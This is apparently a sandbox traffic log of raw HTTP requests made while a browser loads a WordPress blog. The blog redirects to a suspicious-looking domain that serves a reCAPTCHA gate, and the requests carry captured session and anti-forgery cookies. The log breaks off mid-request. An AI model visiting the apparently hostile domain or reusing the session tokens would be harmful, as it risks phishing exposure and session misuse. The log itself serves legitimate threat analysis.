    Source: global trafficHTTP traffic detected: GET /wp-content/blog-plugins/marketing-bar/images/wpcom-mark.svg HTTP/1.1Host: s0.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /g.gif?blog=238502921&v=wpcom&tz=-4&user_id=0&subd=dartergary&host=dartergary.wordpress.com&ref=&rand=0.82970019227276 HTTP/1.1Host: pixel.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /g.gif?x_stats-initial-visibility=visible&v=wpcom-no-pv&rand=0.7921517821766884 HTTP/1.1Host: pixel.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /g.gif?crypt=UE40eW5QN0p8M2Y%2FRE1mJVY3bm9aR3VCbS9mWm1pRyZuJS1LX1t5QmRXZzE3RC9rQWZHK1FjbDltdWdaMVFFZTcxUGVHLWR0WTJoODFFSDFKMmdBdysuWmJ6fkpUJXxZPVlCQm1qNSxSYkxYZXV0d1ZYLjE1aVdvYUNlcHlGVl0vNXF%2BVEw2QmdPMUg9NjdbdU05bi4%2FZnomWzdTdHwyV3RtM25VTEE0Sm50bFozWEt5VWJ5UDU4Nk1NQ0E1R3A4VityWnxrYS80QUtiWTkuXXc1NnN5RGtkNGpCY2I9TyxuTFNJXW5FWGtVLEMxK0h%2BLndnQnc%3D&v=wpcom-no-pv&rand=0.16543343148914724 HTTP/1.1Host: pixel.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /t.gif?is_current_user_blog_owner=false&_en=wpcom_marketing_bar_impression&_ui=17YqG79Brj34dSgrHP4bzBgK&_ut=anon&_ts=1730228981995&_tz=4&_lg=en-US&_pf=Win32&_ht=1024&_wd=1280&_sx=0&_sy=0&_dl=https%3A%2F%2Fdartergary.wordpress.com%2F&_dr=&blog_id=238502921&blog_tz=-4&user_lang=en&blog_lang=en&user_id=0&_rt=1730228981996&_=_ HTTP/1.1Host: pixel.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?m=1719498190i&ver=6.7-RC1-59308 HTTP/1.1Host: s2.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/mu-plugins/actionbar/actionbar.css?v=20241015 HTTP/1.1Host: s0.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /i/favicon.ico HTTP/1.1Host: s1.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/mu-plugins/actionbar/actionbar.js?v=20231122 HTTP/1.1Host: s0.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/mu-plugins/actionbar/actionbar.js?v=20231122 HTTP/1.1Host: s0.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /i/favicon.ico HTTP/1.1Host: s1.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ywH7FaLO6aH19wT&MD=noSDGOKd HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /c.gif?u=https%3A%2F%2Fusqe.bin4tgla.com%2FfpI2Ggql%2F&r=&b=238502921&p=0&rand=0.5834010147506843 HTTP/1.1Host: pixel.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fpI2Ggql/ HTTP/1.1Host: usqe.bin4tgla.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://dartergary.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /c.gif?u=https%3A%2F%2Fusqe.bin4tgla.com%2FfpI2Ggql%2F&r=&b=238502921&p=0&rand=0.5834010147506843 HTTP/1.1Host: pixel.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://usqe.bin4tgla.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?render=explicit HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://usqe.bin4tgla.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api.js?render=explicit HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: usqe.bin4tgla.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://usqe.bin4tgla.com/fpI2Ggql/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ink5a3lvWlZtaGdPTUdzNXNWNFkrdHc9PSIsInZhbHVlIjoiRWtVK3RlVkExNXRPYkdoY3lXTjNGUGFnVHA0SjFMMXhTMzVpbzlxQ3JzbC9hV0o2a2lwOElUaGJhN2p3ZTJncjNLZ1M2NHdBazBXTUkrQU45c2FJdGNHN3RBSHJtbEZDMVRXT2dYOEVKdmVXbFFBdktPNWoyeXdwckhuaU95cHQiLCJtYWMiOiI5ZGUyMzkxNDc4NzQ2YTczYmI5YjE3ODYwMzMzMWMzNGU3MGY3ZTU2NGYxZmZlYjE4Mzg1MmUzNGY3NjY3MjE0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdKZTFpa3A0RzhTUEJNaCtwZ1ZUeWc9PSIsInZhbHVlIjoiam5sUXVYVk1Na200QWpnbmdySVMxQk1HdExOcXlFdzhPMFZ1ZDBMZDN4TDRjaC9nanRWaVVRYk5FWU9HSFJvWTBxdHZKUzZGRzJCYkFUOFVUMC9WZXNoTWFaZUQzNjlUZ0s5a2k2OTY4TlRlYTZCOUxSaEE2Rm11d3hhUk1aZU4iLCJtYWMiOiI2Y2Y0ODgwMjlmYThiNWY0Mjc3Y2U4NDcyMmUwZWExZjFjNDQ5Nzk0MWMxOTZmZGU0Mzc4ODE0YmJjZmNkMDkzIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&co=aHR0cHM6Ly91c3FlLmJpbjR0Z2xhLmNvbTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=normal&cb=5a6ztk5kgw7u HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://usqe.bin4tgla.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&co=aHR0cHM6Ly91c3FlLmJpbjR0Z2xhLmNvbTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=normal&cb=5a6ztk5kgw7uAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/bg/p-7RyvuJU9m0QQmVDJx8SL9t4pWXVpOJSp0296ydJmo.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&co=aHR0cHM6Ly91c3FlLmJpbjR0Z2xhLmNvbTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=normal&cb=5a6ztk5kgw7uAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/bg/p-7RyvuJU9m0QQmVDJx8SL9t4pWXVpOJSp0296ydJmo.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://usqe.bin4tgla.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/reload?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA7MXNoyJ98S8vYaKLVqOcyY96RFM577XE7fN75VpW1iO88SKR5BFLUDXQYN6ZT6AAmlO5WeZkMpc217Wa4fJBZT26_qOGNLjCXPfphKnud4CrzjckIdyCYWEqv14VONcvyKT8Ae4OUaDk2THegyHWo61miM2k-HD_c9WTjFQEYHMJcaBeKaAzWmtGr9qkrxck0w5AXU0-5jarhqehysIrtBXSiUYQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AFAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA7MXNoyJ98S8vYaKLVqOcyY96RFM577XE7fN75VpW1iO88SKR5BFLUDXQYN6ZT6AAmlO5WeZkMpc217Wa4fJBZT26_qOGNLjCXPfphKnud4CrzjckIdyCYWEqv14VONcvyKT8Ae4OUaDk2THegyHWo61miM2k-HD_c9WTjFQEYHMJcaBeKaAzWmtGr9qkrxck0w5AXU0-5jarhqehysIrtBXSiUYQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA6dVEIzpM3JHrpCYl9jcz_iqJn4_8jFXNv0yxm-6V4bX-xWihKEepTmtHOMOHVz3RjBTrXT7dN7gYxYTmvM9pch9frD_2Mt3aIGC1iHFdAculPLW-E-pvMwfXqdU-eFFIvfmgYdo6khSBA0SncV71vkgo0b4sCXigzgrEIRJFzMpiO5gqUj7ZosUIYXEi-OK8ItEStpAw4diRUHM1nMSnHfpBwisw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=6666e44f208ad0c5 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AFAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA7xha3gxL0LyuWF8xqJSoCy9aQ-CZnuJeBttoz9_4u-0dr2ooWnm-XyId997e5APa7ifIuB7pzFl0Ld1JHgMi727Mh_bXvh33TfwJ0QP4-jBMaOIGMY9nVllrV0ucFNLw_YWa5NAg0HBGl7nBIePGFmWIlko0bVYW4FzRKb_r8YRN5GuA3Fdmj1g-URC-WVZUOlHiPBV-qRB8c5HFucXS6ADUe7iw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=e16caff0ee415144 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AFAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 